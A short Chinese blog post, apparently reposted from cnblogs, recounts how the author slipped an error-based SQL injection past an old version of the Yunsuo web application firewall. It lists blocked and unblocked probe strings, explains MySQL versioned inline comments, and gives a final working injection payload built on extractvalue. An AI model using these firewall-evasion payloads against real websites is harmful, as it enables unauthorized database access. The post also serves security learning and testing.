首页 > 其他 > 详细

老版本云锁bypass小记

时间:2021-01-28 21:04:40      阅读:23      评论:0      收藏:0      [点我收藏+]

起因

最近有空的时候会挖挖漏洞,今天注入的时候遇到了老版本的云锁,简单记录bypass过程

漏洞点

因为漏洞点是一个报错注入,使用?id=extractvalue()函数就会被拦截,如图:

技术分享图片

使用?id=extractvalue不被拦截

技术分享图片

使用内联注释分离函数和括号

关于内联注释

/* */mysql中是多行注释,但是如果在中间添加了!,那么!后面的内容会被执行,如图:

技术分享图片

bypass

构造 ?id=extractvalue/*!()*/被拦截

构造?id=extractvalue/*!1()*/不拦截

构造?id=/*!40000/*!30000extractvalue*/()不拦截

最终payload为:

?id=extractvalue/*!40000(1,concat(char(126),md5(1654670033)))*/

技术分享图片

成功注入

参考链接

老版本云锁bypass小记

原文:https://www.cnblogs.com/Cl0ud/p/14341616.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!